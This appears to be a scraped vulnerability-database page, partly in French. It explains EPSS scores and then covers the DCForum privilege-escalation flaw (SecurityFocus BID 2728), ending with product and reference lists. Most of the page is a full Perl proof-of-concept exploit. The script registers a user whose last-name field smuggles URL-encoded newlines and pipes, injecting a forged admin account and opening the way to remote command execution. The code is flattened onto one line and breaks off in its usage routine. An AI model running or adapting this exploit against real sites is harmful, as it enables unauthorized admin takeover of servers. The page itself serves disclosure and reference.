Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#source: https://www.securityfocus.com/bid/2728/info # #DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums. # #Versions of DCForum are vulnerable to attacks which can yield an elevation of privileges and remote execution of arbitrary commands. # #DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information. # #When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters. # #DCForum fails to properly validate this user-supplied account information. As a result, an attacker can cause a corruption of the script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By appending desired values to the last name field, an attacker can insert account information for a new user, and specify admin privileges. # #This newly-created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the webserver process. # #!/usr/bin/perl # dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin@qDefense.com use Getopt::Std; use IO::Socket; getopts ('ap'); usage () unless ($#ARGV == 0 || $#ARGV == 1); if ($opt_a) { print "\n -a not implemented yet\n\n"; exit 1; } $host = $ARGV[0]; $uri = $ARGV[1] ? $ARGV[1] : '/cgi-bin/dcforum/dcboard.cgi'; $username = 'evilhacker' . ( int rand(9899) + 100); $password = int rand (9899) + 100; $hash = $opt_p ? $password : crypt ($password, substr ($password, 0, 2)); $dummyuser = 'not' . ( int rand(9899) + 100) ; $dummypass = int rand (9899) + 100; print "\n(Debugging info: Hash = $hash Dummyuser = $dummyuser Dummypass = $dummypass)\n"; print "Attempting to register username $username with password $password as admin . . .\n"; $sock = IO::Socket::INET->new("$host:80") or die "Unable to connect to $host: $!\n\n"; $req = "GET $uri?command=register&az=user_register&Username=$dummyuser&Password=$dummypass&dup_Password=$dummypass"; $req .= "&Firstname=Proof&Lastname=Concept%0a$hash%7c$username%7cadmin%7cProof%7cConcept&EMail=nothere%40nomail.com"; $req .= "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail HTTP/1.0\015\012"; $req .= "Host: $host\015\012\015\012"; print $sock $req; print "The server replied:\n\n"; while (<$sock>) { if (/BODY/) { $in_body = 1; } next unless $in_body; if (/form|<\/BODY>/) { last; } s/<.+?>//g; print $_ unless (/^\s*$/); } print "\nNote: Even if your password is supposed to be e-mailed to you, it should work right away.\n"; sub usage { print <

Products Mentioned

Configuraton 0

Dcscripts>>Dcforum >> Version 6.0

Dcscripts>>Dcforum_2000 >> Version 1.0

References

http://www.osvdb.org/480
Tags : vdb-entry, x_refsource_OSVDB

http://archives.neohapsis.com/archives/bugtraq/2001-05/0122.html
Tags : mailing-list, x_refsource_BUGTRAQ

https://exchange.xforce.ibmcloud.com/vulnerabilities/6538
Tags : vdb-entry, x_refsource_XF

http://www.dcscripts.com/dcforum/dcfNews/167.html
Tags : x_refsource_CONFIRM

http://www.securityfocus.com/bid/2728
Tags : vdb-entry, x_refsource_BID